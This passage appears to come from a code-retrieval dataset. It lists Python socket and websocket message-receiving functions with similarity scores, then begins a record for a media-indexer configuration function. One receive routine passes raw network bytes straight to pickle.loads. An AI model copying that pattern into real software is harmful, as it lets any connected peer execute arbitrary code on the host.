msg)\n l = len(self.communicator.frames)\n #TODO: self.machine['frame_cnt'] = l\n self.strip.show()\n self.machine.events.post_async('raspberry_frame_count', frame_cnt=l, frames=self.communicator.frames)", "async def listen(self):\n\n while True:\n if not self.connected:\n # sleep and hope the checker fixes us\n await asyncio.sleep(5)\n continue\n data = await self.read_one_message()\n if data is None:\n await asyncio.sleep(1)\n continue\n mtype = self.find_balboa_mtype(data)\n\n if mtype is None:\n self.log.error(\"Spa sent an unknown message type.\")\n await asyncio.sleep(0.1)\n continue\n if mtype == BMTR_CONFIG_RESP:\n (self.macaddr, junk, morejunk) = self.parse_config_resp(data)\n await asyncio.sleep(0.1)\n continue\n if mtype == BMTR_STATUS_UPDATE:\n await self.parse_status_update(data)\n await asyncio.sleep(0.1)\n continue\n if mtype == BMTR_PANEL_RESP:\n self.parse_panel_config_resp(data)\n await asyncio.sleep(0.1)\n continue\n if mtype == BMTR_PANEL_NOCLUE1:\n self.parse_noclue1(data)\n await asyncio.sleep(0.1)\n continue\n self.log.error(\"Unhandled mtype {0}\".format(mtype))", "def client_request(self, evt):\n threads.deferToThread(self.cli_db.accept, evt)", "def loop(self):\n\n while True:\n data = self.socket.recv(1024*8)\n\n if len(data) <= 0:\n raise NodeDisconnectException(\"Node disconnected.\")\n \n self.buffer.write(data)\n data = self.receive_message()\n\n # Check if the message is still incomplete to parse\n if data is None:\n continue\n\n # Check for the header and message\n message_header, message = data\n if not message:\n continue\n\n handle_func_name = \"handle_\" + message_header.command\n handle_func = getattr(self, handle_func_name, None)\n if handle_func:\n handle_func(message_header, message)", "def monitor(self):\n while True:\n client_socket, client_address = self.server_socket.accept()\n print(\"New client connection accepted: {}:{}\".format(*client_address))\n threading.Thread(target=self.handle_client, args=[client_socket]).start()", "def run(self):\n log.info(\"Starting thread\")\n if self.open_listener():\n\n # This feels so dirty, but we need to make sure the thread isn't always blocking so we\n # can safely shutdown the thread. Given that the Listener address is always an IP\n # it should be safe. Should be, famous last words of course...\n conn = self.listener._listener._socket\n\n while self.running:\n r_list, w_list, e_list = select.select([conn, ], [conn, ], [conn, ], 0.01)\n\n if conn in r_list:\n connection = None\n try:\n connection = self.listener.accept()\n log.info(\"Connection opened by %s\", self.listener.last_accepted)\n\n while self.running:\n if connection.poll():\n msg = connection.recv()\n globals.strip_data.spi_recv(msg)\n except (IOError, EOFError):\n if connection:\n connection.close()\n log.info(\"Connection closed %s\", self.listener.last_accepted)\n\n log.info(\"Exiting thread\")", "def handle(self):\n try:\n # Wait for data\n data = json.loads(self.request.recv(1024).decode('UTF-8').strip())\n\n # Process data\n self.process_data(data)\n\n except Exception as e:\n print(\"Exception wile receiving message: \", e)\n self.request.sendall(\n bytes(json.dumps({'return': 'error'}), 'UTF-8'))", "def __comms_thread_body(self):\n\n # Define a callback that will handle receipt of data.\n def comms_callback(received, prog):\n \"\"\" Asynchronous callback issued when the FTDI device receives data. \"\"\"\n\n try:\n self.handle_incoming_bytes(received)\n return int(self.__comm_term) \n\n except Exception as e:\n self.__comm_term = True\n self.__comm_exc = e\n return 1\n\n # Repeately try to read from the FTDI device, and handle its results.\n # FIXME: replace the termination object with an threading.Event.\n while not self.__comm_term:\n self.ftdi.read_async(self.ftdi.INTERFACE_A, comms_callback, 8, 16)\n\n # If a failure occurred in parsing, raise it out of our asynchronous context.\n # TODO: exception should be locked\n if self.__comm_exc:\n raise self.__comm_exc", "def handle_received(self) -> None:\n self.buffer: bytes\n while self.buffer:\n try:\n request, self.buffer = parse_request(self.buffer)\n if request is None:\n _LOGGER.debug(\"Not enough data to parse request on event channel\")\n break\n\n _LOGGER.debug(\"Got message on event channel: %s\", request)\n\n # Send a positive response to satisfy the other end of the channel\n # TODO: Add public method to pyatv.http to format a message\n headers = {\n \"Content-Length\": 0,\n \"Audio-Latency\": 0,\n \"Server\": request.headers.get(\"Server\"),\n \"CSeq\": request.headers.get(\"CSeq\"),\n }\n response = (\n f\"{request.protocol}/{request.version} 200 OK\\r\\n\"\n + \"\\r\\n\".join(f\"{key}: {value}\" for key, value in headers.items())\n + \"\\r\\n\\r\\n\"\n )\n self.send(response.encode(\"utf-8\"))\n except Exception:\n _LOGGER.exception(\"Failed to handle message on event channel\")", "def receive_loop(self):\n msg_buffer = bytes() # The message input buffer\n while not self._shutdown.is_set():\n if msg_buffer:\n try:\n msg_length = self.determine_length_of_json_msg(msg_buffer)\n except InvalidLengthHeader:\n msg_length = float(\"inf\")\n if len(msg_buffer) >= msg_length:\n message = self.extract_msg(msg_buffer, msg_length)\n try:\n handler = getattr(self, \"handle_\" + message['type'])\n except AttributeError:\n print(\"Can't handle message of type: \" +\n str(message['type']))\n continue\n handler(message)\n msg_buffer = msg_buffer[msg_length:]\n else:\n try:\n msg_buffer += connection.recv(1024)\n except socket.timeout:\n pass\n else:\n try:\n msg_buffer += connection.recv(1024)\n except socket.timeout:\n pass", "def handle_client(self,conn,addr):\n print(f\"[NEW CONNECTION] {addr} connected\")\n client_id = \"\"\n connected = True\n while connected:\n try:\n try:\n msg_length = conn.recv(PREFIX).decode(FORMAT)\n except:\n print(f\"[{addr}] DISCONNECTED\")\n self.handle_unexpected_disconnect(client_id,conn)\n return\n\n if msg_length:\n try:\n msg_length = int(msg_length)\n try:\n raw_msg = conn.recv(msg_length).decode(FORMAT)\n except:\n print(f\"[{addr}] DISCONNECTED\")\n self.handle_unexpected_disconnect(client_id,conn)\n return\n message = json.loads(raw_msg)\n except ValueError:\n message = FAILURE_MESSAGE\n\n if message[\"HEADER\"] == DISCONNECT_MESSAGE:\n connected = False\n self.handle_disconnect(message,conn)\n\n elif message[\"HEADER\"] == \"CREATE\":\n session_id = \"\".join(random.choices(string.ascii_uppercase + string.digits, k = 4))\n indentifer = json.loads(message[\"MESSAGE\"])\n tokenDict = json.loads(indentifer[\"spotify_token\"])\n client_id = message[\"ID\"]\n self.create_session(session_id, message[\"ID\"], indentifer[\"display_name\"], tokenDict)\n self.add_connection_entry(message[\"ID\"], indentifer[\"display_name\"], session_id, True, conn, addr)\n self.create_spotify_player(session_id)\n if not self.sessions[session_id][\"HOST\"][\"spotify_player\"].is_spotify_running():\n self.send(\"STC\", client_id, \"PLEASE START SPOTIFY\")\n\n self.send(\"SESSION_ID\", client_id, str(session_id))\n\n elif message[\"HEADER\"] == \"GET_CURRENT_SONG\":\n player = self.get_session_player(self.get_session_from_user(message[\"ID\"]))\n if not self.sessions[session_id][\"HOST\"][\"spotify_player\"].is_spotify_running():\n self.send(\"STC\", client_id, \"PLEASE START SPOTIFY\")\n else:\n current_track = {}\n current_track[\"name\"] = player.sp.currently_playing()['item']['name']\n current_track[\"artist\"] = player.sp.currently_playing()['item']['album']['artists'][0]['name']\n track_json = json.dumps(current_track)\n self.send(\"CURRENT_SONG\", message[\"ID\"],track_json)\n\n elif message[\"HEADER\"] == \"SKIP\":\n player = self.get_session_player(self.get_session_from_user(message[\"ID\"]))\n session_id = self.get_session_from_user(message[\"ID\"])\n session_queue = self.get_session_queue(session_id)\n if len(session_queue) > 0:\n player.add_to_queue(session_queue[0][1])\n session_queue.pop(0)\n self.send_queue_update(session_id)\n player.next_track()\n\n elif message[\"HEADER\"] == \"REWIND\":\n player = self.get_session_player(self.get_session_from_user(message[\"ID\"]))\n player.previous_track()\n\n elif message[\"HEADER\"] == \"PLAY\":\n session_id = self.get_session_from_user(message[\"ID\"])\n player = self.get_session_player(self.get_session_from_user(message[\"ID\"]))\n player.toggle_playback()\n\n elif message[\"HEADER\"] == \"SEARCH\":\n player = self.get_session_player(self.get_session_from_user(message[\"ID\"]))\n song = message[\"MESSAGE\"]\n self.send(\"SEARCH_RESULTS\", message[\"ID\"], json.dumps(player.search(song)))\n\n\n\n\n elif message[\"HEADER\"] == \"ADD_TO_QUEUE\":\n track_data = json.loads(message[\"MESSAGE\"])\n self.add_to_session_queue(message[\"ID\"], (track_data[\"name\"],track_data['uri']))\n session_id = self.get_session_from_user(message[\"ID\"])\n\n\n elif message[\"HEADER\"] == \"QUEUE_UPDATE\":\n options = json.loads(message[\"MESSAGE\"])\n self.update_queue(message[\"ID\"],options)\n\n elif message[\"HEADER\"] == \"GET_USERS\":\n session_id = self.get_session_from_user(message[\"ID\"])\n users = self.sessions[session_id][\"USERS\"]\n self.send(\"USERS\", message[\"ID\"], json.dumps(users))\n\n elif message[\"HEADER\"] == \"SET_PERMISSION\":\n msg = json.loads(message[\"MESSAGE\"])\n session_id = self.get_session_from_user(message[\"ID\"])\n self.change_user_permissions(session_id, msg[\"client_id\"], msg[\"permission\"])\n new_permissions = {}\n new_permissions[\"permission\"] = msg[\"permission\"]\n new_permissions[\"value\"] = self.sessions[session_id][\"USERS\"][msg[\"client_id\"]][\"permissions\"][msg[\"permission\"]]\n self.send(\"PERMISSION_UPDATE\",msg[\"client_id\"], json.dumps(new_permissions))\n\n elif message[\"HEADER\"] == \"JOIN\":\n msg = json.loads(message[\"MESSAGE\"])\n session_id = msg[\"session_id\"]\n if session_id in self.sessions.keys():\n self.add_user_to_session(session_id,message[\"ID\"],msg[\"display_name\"])\n self.add_connection_entry(message[\"ID\"],msg[\"display_name\"],session_id, False, conn, addr)\n client_id = message[\"ID\"]\n\n session_info = {}\n session_info[\"session_id\"] = session_id\n session_info[\"host\"] = self.sessions[session_id][\"HOST\"][\"NAME\"]\n\n self.send(\"SESSION_INFO\", message[\"ID\"], json.dumps(session_info))\n self.send(\"QUEUE_UPDATE\", message[\"ID\"], json.dumps(self.get_session_queue(session_id)))\n self.broadcast_to_session(session_id,\"USERS\", json.dumps(self.sessions[session_id][\"USERS\"]))\n else:\n self.add_connection_entry(message[\"ID\"],msg[\"display_name\"],session_id, False, conn, addr)\n self.send(\"FAILURE\", message[\"ID\"], \"Session does not exist\")\n self.send(DISCONNECT_MESSAGE,message[\"ID\"],DISCONNECT_MESSAGE)\n self.delete_connection_entry(message[\"ID\"])\n break\n elif message[\"HEADER\"] == \"SET_PERMISSIONS\":\n msg = json.loads(message[\"MESSAGE\"])\n user_id = msg[\"client_id\"]\n permissions = json.loads(msg[\"permissions\"])\n for key in permissions.keys():\n self.set_permissions(user_id,key,permissions[key])\n self.print_sessions()\n\n elif message[\"HEADER\"] == \"BROADCAST_S\":\n session_id = self.connections[message[\"ID\"]][\"session_id\"]\n self.broadcast_to_session(session_id,\"BROADCAST_S\", message[\"MESSAGE\"])\n elif message[\"HEADER\"] == \"BROADCAST\":\n self.broadcast_to_all(\"BROADCAST\", message[\"MESSAGE\"])\n\n elif message[\"HEADER\"] == \"PLAYBACK\":\n session_id = self.connections[message[\"ID\"]][\"session_id\"]\n sp = self.sessions[session_id][\"HOST\"][\"spotify_player\"]\n if not sp.toggle_playback():\n self.broadcast_to_session(self.get_session_from_user(client_id), \"FAILURE\", \"Please Start Spotify\")\n\n else:\n print(message[\"MESSAGE\"])\n except Exception as ex:\n print(str(ex))\n\n print(\"Thread Closing\")", "def read_for_remote_control(self):\n try:\n if self.is_connect():\n print_msg(self.name, \"Receiving socket package\")\n b_data = self.client_sock.recv(1024)\n print \"Received from Android: %s\" % b_data\n if len(b_data) != 0:\n print_msg(self.name, \"decoding\")\n message = self.__decode_n_execute(b_data)\n self.write(message)\n except IOError:\n print_msg(self.name, \"disconnected\")\n self.is_connected = False\n self.client_sock.close()\n self.disconnect()\n sys.exit(-1)", "def server(conn, address):\n print(\"Client Connection Open\")\n while True:\n request = server_read(conn)\n if request:\n print(request)\n manage_client(request, conn)", "def run(self):\n\n self.dbg_state = \"running\"\n\n while self.active:\n try:\n sel_in, sel_out, sel_err = \\\n select.select(self.sockets(), [], self.sockets(), 1)\n except:\n print( sys.exc_info())\n self.logger.error(\"Select error, disconnecting\")\n self.disconnect()\n\n for s in sel_err:\n self.logger.error(\"Got socket error on: \" + str(s) + \", disconnecting\")\n self.disconnect()\n\n for s in sel_in:\n if self._socket_ready_handle(s) == -1:\n self.disconnect()\n\n # End of main loop\n self.dbg_state = \"closing\"\n self.logger.info(\"Exiting controller thread\")\n self.shutdown()", "def handle_read(self):\n packet = self.recv(8192)\n if packet == \"\":\n #print \"[WARNING] Socket closed by remote host %s:%s\" % (\n # self.address,self.port)\n self.close()\n return\n packet_list = messages.separate_messages(packet)\n #received_types = \" + \".join(\n # messages.get_message_type(messages.parse(packet))\n # for packet in packet_list)\n #print \"From %s:%s received: \" % (self.address, self.port), received_types\n # Process a single message at a time\n for packet in packet_list:\n message = messages.parse(packet)\n if messages.get_message_type(message) == \"OFPT_ECHO_REQUEST\":\n self.buffer.append(messages.of_echo_reply)\n else:\n self.handle_message(message)", "def read_for_explore_run(self):\n b_data = self.client_sock.recv(1024)\n if b_data!=None and len(b_data)!=0:\n if b_data!=\"GRID\": # AUTO mode in android, to avoid flush cmd\n print \"Received from Android: %s\" % b_data\n if b_data==\"explore\":\n print_msg(self.name, \"Setting \\\"explore\\\" flag\")\n self.explore_start = True\n elif b_data==\"run\":\n print_msg(self.name, \"Setting \\\"run\\\" flag\")\n self.run_start = True\n else:\n pass", "def _recv_thread_func(self):\r\n reconnect_time = 1\r\n use_ssl = self.config.get_bool(\"gox\", \"use_ssl\")\r\n wsp = {True: \"wss://\", False: \"ws://\"}[use_ssl]\r\n port = {True: 443, False: 80}[use_ssl]\r\n ws_origin = \"%s:%d\" % (self.hostname, port)\r\n ws_headers = [\"User-Agent: %s\" % USER_AGENT]\r\n while not self._terminating: #loop 0 (connect, reconnect)\r\n try:\r\n # channels separated by \"/\", wildcards allowed. Available\r\n # channels see here: https://mtgox.com/api/2/stream/list_public\r\n # example: ws://websocket.mtgox.com/?Channel=depth.LTCEUR/ticker.LTCEUR\r\n # the trades and lag channel will be subscribed after connect\r\n sym = \"%s%s\" % (self.curr_base, self.curr_quote)\r\n if not FORCE_NO_DEPTH:\r\n ws_url = \"%s%s?Channel=depth.%s/ticker.%s\" % \\\r\n (wsp, self.hostname, sym, sym)\r\n else:\r\n ws_url = \"%s%s?Channel=ticker.%s\" % \\\r\n (wsp, self.hostname, sym)\r\n self.debug(\"### trying plain old Websocket: %s ... \" % ws_url)\r\n\r\n self.socket = websocket.WebSocket()\r\n # The server is somewhat picky when it comes to the exact\r\n # host:port syntax of the origin header, so I am supplying\r\n # my own origin header instead of the auto-generated one\r\n self.socket.connect(ws_url, origin=ws_origin, header=ws_headers)\r\n self._time_last_received = time.time()\r\n self.connected = True\r\n self.debug(\"### connected, subscribing needed channels\")\r\n self.channel_subscribe()\r\n self.debug(\"### waiting for data...\")\r\n self.signal_connected(self, None)\r\n while not self._terminating: #loop1 (read messages)\r\n str_json = self.socket.recv()\r\n self._time_last_received = time.time()\r\n if str_json[0] == \"{\":\r\n self.signal_recv(self, (str_json))\r\n\r\n except Exception as exc:\r\n self.connected = False\r\n self.signal_disconnected(self, None)\r\n if not self._terminating:\r\n self.debug(\"### \", exc.__class__.__name__, exc,\r\n \"reconnecting in %i seconds...\" % reconnect_time)\r\n if self.socket:\r\n self.socket.close()\r\n time.sleep(reconnect_time)", "def recv(self, conn):\n flags = {\"Z\": 0, \"B\": 0}\n meta = {\"status\": \"\", \"length\": \"\"}\n def reset():\n \"\"\"\n resets if data corruption detected via mis-matches\n :return: None\n \"\"\"\n for i in flags.keys(): flags[i] = 0\n for i in meta.keys(): meta[i] = \"\"\n return (None, \"CON\")\n while True:\n self.logger.info(conn.recv(1, socket.MSG_PEEK))\n if not len(conn.recv(1, socket.MSG_PEEK)) > 0: return (None, \"CON\")\n self.logger.info(\"Running\")\n i = conn.recv(1)\n if chr(i) == \"Z\" and flags[\"Z\"] < 3:\n flags[\"Z\"] += 1\n continue\n elif flags[\"Z\"] < 3 and chr(i) != \"Z\": reset() #corruption condition\n # puts everything between Z & B into status string\n if flags[\"Z\"] == 3 and chr(i) != \"B\" and len(meta[\"status\"]) < 3:\n meta[\"status\"] += chr(i)\n continue\n # cycles through B's until length\n if chr(i) == \"B\" and flags[\"B\"] < 3:\n flags[\"B\"] += 1\n continue\n elif flags[\"B\"] < 3 and chr(i) != \"B\": reset() #corruption condition\n if flags[\"B\"] == 3 and chr(i) != \"C\":\n meta[\"length\"] += chr(i)\n continue\n if flags[\"B\"] == 3 and chr(i) == \"C\":\n # return tuple (py object, status)\n #super().read(1) #kick \"C\" out of the serial buffer\n self.logger.debug(f\"Attempting to load packet of size {meta['length']}\")\n packet = (\n pickle.loads(conn.recv(int(meta[\"length\"]))),\n meta[\"status\"]\n )\n self.logger.debug(f\"Received Packet of size {sys.getsizeof(packet[0])} Bytes with Network Status {packet[1]}\")\n if packet[1] == \"FIN\":\n self.logger.warning(\"Lost Connection, looking for devices\")\n self.connection = False\n elif packet[1] == \"ACK\" and self.connection:\n #clear buffer of residual ACK packets\n return self.recv()\n return packet", "def _receive_thread_run(self):\n while not self._class_destroy_event.is_set():\n if self._sock is not None:\n data = self._sock.recv(1024)\n if data is not None and len(data) > 0:\n if self.data_received_handler is not None:\n if callable(self.data_received_handler):\n self.data_received_handler(data)\n else:\n raise ValueError(\n 'data_received_handler is not callable.')", "def handle(self):\r\n assert self.prepared, \"You have to call prepare before handle\"\r\n rset, wset, xset = self._select()\r\n for readable in rset:\r\n if readable == self._read.fileno():\r\n # don't care i just need to clean readable flag\r\n self._read.recv(1024) \r\n elif readable == self.socket.handle.fileno():\r\n client = self.socket.accept().handle\r\n self.clients[client.fileno()] = Connection(client, self.wake_up)\r\n else:\r\n connection = self.clients[readable]\r\n connection.read()\r\n if connection.status == WAIT_PROCESS:\r\n itransport = TTransport.TMemoryBuffer(connection.message)\r\n otransport = TTransport.TMemoryBuffer()\r\n iprot = self.in_protocol.getProtocol(itransport)\r\n oprot = self.out_protocol.getProtocol(otransport)\r\n self.tasks.put([self.processor, iprot, oprot, \r\n otransport, connection.ready])\r\n for writeable in wset:\r\n self.clients[writeable].write()\r\n for oob in xset:\r\n self.clients[oob].close()\r\n del self.clients[oob]", "def read(self):\n buff = self.conn.recv(4096)\n if (self.algo == \"rsa\"):\n buff = self.rsa_decrypt(buff)\n if (self.algo == \"des\"):\n buff = self.des_decrypt(buff)\n if (self.algo == \"3des\"):\n buff = self.triple_des_decrypt(buff)\n if (self.algo == \"aes\"):\n buff = self.aes_decrypt(buff)\n\n while buff.strip() != self.exitcode and len(buff) > 0:\n print 'Message received: ', buff.strip()\n #buff = self.rsa_decrypt(buff)\n buff = self.conn.recv(4096)\n\n if (self.algo == \"rsa\"):\n buff = self.rsa_decrypt(buff)\n if (self.algo == \"des\"):\n buff = self.des_decrypt(buff)\n if (self.algo == \"3des\"):\n buff = self.triple_des_decrypt(buff)\n if (self.algo == \"aes\"):\n buff = self.aes_decrypt(buff)\n # client disconnected\n self.stopWrite", "async def _process_messages(self) -> None:\n try:\n while not self._client.closed:\n msg = await self._client.receive()\n\n if msg.type in (WSMsgType.CLOSE, WSMsgType.CLOSED, WSMsgType.CLOSING):\n break\n\n if msg.type == WSMsgType.ERROR:\n raise ConnectionFailed()\n\n if msg.type != WSMsgType.TEXT:\n raise InvalidMessage(f\"Received non-Text message: {msg.type}\")\n\n try:\n data = msg.json(loads=ujson.loads)\n except ValueError as err:\n raise InvalidMessage(\"Received invalid JSON.\") from err\n\n if LOGGER.isEnabledFor(logging.DEBUG):\n LOGGER.debug(\"Received message:\\n%s\\n\", pprint.pformat(msg))\n\n self._handle_incoming_message(data)\n\n finally:\n # TODO: handle reconnect!\n LOGGER.debug(\"Listen completed. Cleaning up\")\n\n for future in self._result_futures.values():\n future.cancel()\n\n if not self._client.closed:\n await self._client.close()\n\n if self._shutdown_complete_event:\n self._shutdown_complete_event.set()\n else:\n LOGGER.debug(\"Connection lost, will reconnect in 10 seconds...\")\n self._loop.create_task(self._auto_reconnect())", "def _pve_control_cb(self, msg):\n self._data_available = True\n self._cmd = msg.data", "def run(self, sock, client):\n\n\n\t\t\"\"\" Set default variables for the current connection \"\"\"\n\t\tself.sock = sock\n\t\tself.client = client\n\t\tself.write_line(self.version)\n\t\tself.running = True;\n\n\t\t\"\"\" Take input from socket, while running \"\"\"\n\t\twhile self.running == True:\n\t\t\ttry:\n\t\t\t\tself.last_line = self.read_line();\n\n\t\t\t\tif self.last_line == False:\n\t\t\t\t\traise Exception(\"Error\")\n\n\t\t\t\tif len(self.last_line) != 0:\n\t\t\t\t\taction = shlex.split(self.last_line.lower())\n\t\t\t\t\tthread = threading.Thread(target = self.call_method, args = [action])\n\t\t\t\t\tthread.start()\n\t\t\texcept Exception as e:\n\t\t\t\tbreak;\n\t\tself.close();", "def _handleRequestCableCheckStatus(self, data):\r\n print(\"\\\"Request Cable Check Status\\\" received\")\r\n self.whitebeet.v2gParseRequestCableCheckStatus(data)\r\n try:\r\n self.whitebeet.v2gSetDcCableCheckStatus(True)\r\n except Warning as e:\r\n print(\"Warning: {}\".format(e))\r\n except ConnectionError as e:\r\n print(\"ConnectionError: {}\".format(e))" ]
[ "0.7136164", "0.66953665", "0.6398843", "0.6384446", "0.63746595", "0.6355251", "0.6276334", "0.62578547", "0.6232429", "0.6153676", "0.61311704", "0.60923487", "0.60865486", "0.6026433", "0.59538", "0.5909406", "0.5902352", "0.58999", "0.58918047", "0.58892024", "0.58742887", "0.5871203", "0.5865603", "0.5857102", "0.5857042", "0.5853978", "0.5846204", "0.5843299", "0.5805365", "0.58023816", "0.5796133", "0.5793163", "0.5788722", "0.57761145", "0.5756788", "0.5750871", "0.57464844", "0.5722945", "0.57205594", "0.5717859", "0.5702455", "0.5702216", "0.5701623", "0.5701623", "0.57010674", "0.56789285", "0.56785154", "0.5670389", "0.56656677", "0.5640294", "0.5639729", "0.5639635", "0.5636831", "0.5631934", "0.56317526", "0.5628861", "0.5624203", "0.56237257", "0.5619387", "0.56129116", "0.56109655", "0.56104285", "0.561016", "0.56029505", "0.55995476", "0.55934876", "0.5591264", "0.55859214", "0.5581455", "0.55784386", "0.5575327", "0.5570811", "0.55549705", "0.55548203", "0.55529726", "0.5549451", "0.55490625", "0.553596", "0.553402", "0.55334556", "0.55324477", "0.5518637", "0.55133736", "0.55122626", "0.55096626", "0.5500964", "0.54975647", "0.5495822", "0.54817593", "0.54788", "0.5477282", "0.5476276", "0.54748154", "0.5474469", "0.54721075", "0.5467595", "0.54603213", "0.5458547", "0.54532033", "0.5451893" ]
0.6803808
1
Generates a sample configuration.
def create_default(self): self.database.lifetime = 604800 self.database.path_media = '../data/media.db' self.database.path_playlist = '../data/playlist.db' self.indexing.audio.rules = [IndexerRuleConfig()] self.indexing.audio.rules[0].directory = '/mnt/hdd/Audio' self.indexing.audio.rules[0].extensions = ['.flac', '.mp3', '.ogg', '.wav'] self.indexing.audio.rules[0].pattern = '{}/{}/{} {}'.format( get_complete_tag(TAG_ARTIST), get_complete_tag(TAG_ALBUM), get_complete_tag(TAG_NUMBER), get_complete_tag(TAG_TITLE)) self.indexing.image.rules = [IndexerRuleConfig()] self.indexing.image.rules[0].directory = '/mnt/hdd/Image' self.indexing.image.rules[0].extensions = ['.gif', '.jpg', '.jpeg', '.png'] self.indexing.image.rules[0].pattern = '{}/{}'.format( get_complete_tag(TAG_ALBUM), get_complete_tag(TAG_TITLE)) self.indexing.video.ignore_revisions = False self.indexing.video.subtitle_rules = [IndexerRuleConfig()] self.indexing.video.subtitle_rules[0].directory = '/mnt/hdd/Video' self.indexing.video.subtitle_rules[0].extensions = ['.srt'] self.indexing.video.subtitle_rules[0].pattern = '{}/Subtitle/{}/{}/{}/{}/{}'.format( get_complete_tag(TAG_TITLE), get_complete_tag(TAG_QUALITY), get_complete_tag(TAG_LANGUAGES), get_complete_tag(TAG_LANGUAGE), get_complete_tag(TAG_ANY), get_complete_tag(TAG_EPISODE_TITLE)) self.indexing.video.video_rules = [IndexerRuleConfig()] self.indexing.video.video_rules[0].directory = '/mnt/hdd/Video' self.indexing.video.video_rules[0].extensions = ['.avi', '.flv', '.mkv', '.mp4'] self.indexing.video.video_rules[0].pattern = '{}/Content/{}/{}/{}/{}'.format( get_complete_tag(TAG_TITLE), get_complete_tag(TAG_QUALITY), get_complete_tag(TAG_LANGUAGES), get_complete_tag(TAG_ANY), get_complete_tag(TAG_EPISODE_TITLE)) self.logging.enabled = True self.logging.level = 'error' self.logging.max_size_bytes = 524288 self.logging.path = '../data/log.txt' self.multimedia.av_player = 'vlc' self.multimedia.av_player_path = '/usr/bin/vlc-wrapper' self.multimedia.image_viewer = 'feh' self.multimedia.image_viewer_path = '/usr/bin/feh' self.web.port = 8095
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _sample_hyperparameters(self):\n\t\tconfig = {}\n\t\tfor attr, option in self._config_options.items():\n\t\t\tprint('Sampling', attr)\n\t\t\tconfig[attr] = option.sample()\n\t\treturn config", "def random_configuration(self):\n raise NotImplementedError", "def generate_configuration(directory):\n \n # conf.py file for Sphinx\n conf = osp.join(get_module_source_path('spyderlib.utils.inspector'),\n 'conf.py')\n\n # Docstring layout page (in Jinja):\n layout = osp.join(osp.join(CONFDIR_PATH, 'templates'), 'layout.html')\n \n os.makedirs(osp.join(directory, 'templates'))\n os.makedirs(osp.join(directory, 'static'))\n shutil.copy(conf, directory)\n shutil.copy(layout, osp.join(directory, 'templates'))\n open(osp.join(directory, '__init__.py'), 'w').write('')\n open(osp.join(directory, 'static', 'empty'), 'w').write('')", "def generate_config(context):\n\n enable_flow_logs = context.properties.get('enableFlowLogs', False)\n\n subnetwork_resource = {\n 'name': context.properties['resourceName'],\n 'type': 'gcp-types/compute-beta:subnetworks',\n 'properties': {\n # Required properties.\n 'name':\n context.properties['name'],\n 'network':\n context.properties['network'],\n 'ipCidrRange':\n context.properties['ipCidrRange'],\n 'region':\n context.properties['region'],\n 'project':\n context.properties['projectId'],\n\n # Optional properties, with defaults.\n 'enableFlowLogs':\n enable_flow_logs,\n 'privateIpGoogleAccess':\n context.properties.get('privateIpGoogleAccess', False),\n 'secondaryIpRanges':\n context.properties.get('secondaryIpRanges', []),\n }\n }\n \n if enable_flow_logs:\n # If flow logs are enabled, we want to adjust the default config in two ways:\n # (1) Increase the sampling ratio (defaults to 0.5) so we sample all traffic.\n # (2) Reduce the aggregation interval to 30 seconds (default is 5secs) to save on\n # storage.\n subnetwork_resource['properties']['logConfig'] = {\n 'aggregationInterval': 'INTERVAL_30_SEC',\n 'enable': True,\n 'flowSampling': 1.0,\n 'metadata': 'INCLUDE_ALL_METADATA',\n }\n\n # Pass the 'dependsOn' property to the subnetwork resource if present.\n if 'dependsOn' in context.properties:\n subnetwork_resource['metadata'] = {\n 'dependsOn': context.properties['dependsOn']\n }\n\n output = [\n {\n 'name': 'name',\n 'value': subnetwork_resource['name'],\n },\n {\n 'name': 'selfLink',\n 'value': '$(ref.{}.selfLink)'.format(subnetwork_resource['name']),\n },\n ]\n\n return {'resources': [subnetwork_resource], 'outputs': output}", "def generate_settings():\r\n conf_file = os.path.join(os.path.dirname(base_settings.__file__),\r\n 'example', 'conf.py')\r\n conf_template = open(conf_file).read()\r\n default_url = 'http://salmon.example.com'\r\n site_url = raw_input(\"What will be the URL for Salmon? [{0}]\".format(\r\n default_url))\r\n site_url = site_url or default_url\r\n secret_key = base64.b64encode(os.urandom(KEY_LENGTH))\r\n api_key = base64.b64encode(os.urandom(KEY_LENGTH))\r\n output = conf_template.format(api_key=api_key, secret_key=secret_key,\r\n site_url=site_url)\r\n return output", "def _config_generator(self, **kwargs):\n self.__logger.info(kwargs)\n generator = GeneratorFactory(self.generator_type, **kwargs)\n self._msg.input.generator.config.CopyFrom(generator.to_msg())", "def generate_config(context):\n resources = []\n\n # Create an initial 'STARTED' pubsub notification.\n if 'pubsubTopic' in context.properties:\n resources.extend(\n create_pubsub_notification(\n context,\n depends_on=[],\n status_string='STARTED',\n ))\n\n # Required properties.\n billing_account_id = context.properties['billingAccountId']\n parent_organization = context.properties['parentOrganization']\n project_id = context.properties['projectId']\n\n # Optional properties, with defaults.\n high_security_network = context.properties.get('highSecurityNetwork', False)\n private_ip_google_access = context.properties.get('privateIpGoogleAccess', False)\n storage_bucket_lifecycle = context.properties.get('storageBucketLifecycle', 180)\n billing_account_friendly_name = context.properties.get('billingAccountFriendlyName', billing_account_id)\n # Use a project name if given, otherwise it's safe to fallback to use the\n # project ID as the name.\n project_name = context.properties.get('projectName', project_id)\n labels_obj = context.properties.get('labels', {})\n\n # Save this template's version number and all parameters inputs to the project metadata to keep track of what\n # operations were performed on a project.\n labels_obj.update({\n \"firecloud-project-template-version\" : str(FIRECLOUD_PROJECT_TEMPLATE_VERSION_ID)\n })\n\n for k, v in context.properties.items():\n label_k, label_v = satisfy_label_requirements('param--' + str(k), v)\n labels_obj.update({\n label_k: label_v\n })\n\n\n if high_security_network:\n labels_obj.update({\n \"vpc-network-name\" : FIRECLOUD_VPC_NETWORK_NAME,\n \"vpc-subnetwork-name\" : FIRECLOUD_VPC_SUBNETWORK_NAME\n })\n\n if 'parentFolder' in context.properties:\n parent_obj = {\n 'id': context.properties['parentFolder'],\n 'type': 'folder',\n }\n else:\n parent_obj = {\n 'id': context.properties['parentOrganization'],\n 'type': 'organization',\n }\n\n # Create the main project resource.\n resources.append({\n 'type': 'templates/project.py',\n 'name': 'fc-project',\n 'properties': {\n 'activateApis': FIRECLOUD_REQUIRED_APIS,\n 'billingAccountId': billing_account_id,\n 'billingAccountFriendlyName': billing_account_friendly_name,\n 'iamPolicies': create_iam_policies(context),\n 'labels': labels_obj,\n 'name': project_name,\n # The project parent. For FireCloud, this should refer to the\n # firecloud.org (or equivalent) GCP organization ID.\n 'parent': parent_obj,\n 'projectId': project_id,\n # If true, this would remove the default compute egine service\n # account. FireCloud doesn't use this SA, but we're leaving this set\n # to False to avoid changing any legacy behavior, at least initially.\n 'removeDefaultSA': False,\n # Removes 